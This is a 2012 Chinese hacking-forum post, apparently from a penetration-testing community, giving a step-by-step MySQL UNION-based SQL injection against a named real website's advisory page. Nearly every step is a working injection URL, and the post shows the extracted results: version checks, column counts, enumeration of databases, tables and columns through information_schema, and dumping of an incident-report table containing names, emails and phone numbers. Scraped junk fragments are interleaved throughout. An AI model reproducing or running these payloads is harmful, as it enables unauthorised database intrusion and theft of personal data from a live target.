中国网络渗透测试联盟

标题: .高级暴库方法讲解 [打印本页]

作者: admin    时间: 2012-9-13 17:57
标题: .高级暴库方法讲解
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
+ G# y0 C) r& {! a3 j* R0 Y% a2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
+ n" L) y* b  |! V& Z& Yhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
' l2 e' \& V6 _9 R2 t  X3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
4 L' X) U) D; w" Q- j' |/ A数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。' t% Q( G) p& B0 J. f9 U
4.判断有没有写权限
+ V. p' ?7 \+ ]" v( j( W$ dhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限; ^, Y+ I9 J! w! J3 P
没办法,手动猜表啦9 Z" p0 F# |0 y5 V' |3 i; C
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1- a1 O: `1 n2 V' y+ c
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下3 Z; c; E4 S7 I( w% f$ w/ Y+ ]8 L+ [
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) k: e- H8 ], g3 M  _* M
成功查出所有数据库,国外的黑客就是不一般。数据库如下:0 u/ H9 B5 |- O8 Q8 s  c
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb7 g) x5 a+ B/ Z" ^, i
6.爆表,爆的是twcert库
9 s- ~: z( K1 f6 @- w. u* qhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
3 l& Z: d: H, s爆出如下表/ C5 ?' P, {- |3 C
downloadfile,irsys,newsdata,secrpt,secrpt_big5
) t/ q4 E$ `5 m8 a" T( V7.爆列名,这次爆的是irsys表+ B; x: @3 @- y% s
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--* z% b; H, l0 i* O8 V$ y" h* y7 Z0 x
爆出如下列
+ z) I/ Z/ C% j8 e( Tir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
: |2 `2 P8 U$ L8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
. o8 l, w9 v2 h  @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
9 D: K. R- D7 _& n" ]4 m返回是3,说明每个列里有3个地段9 j' v6 }9 z0 P- d5 ^9 }3 v
9.爆字段内容0 e$ Z* x- M- E, H) D5 J% A# _" W
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, L7 p9 k/ d! ^爆出name列的第一个字段的内容
; o. {+ n, [/ i1 D' Mhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
( U4 m; v4 N" y9 y6 m, R爆出name列的第二个字段的内容




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2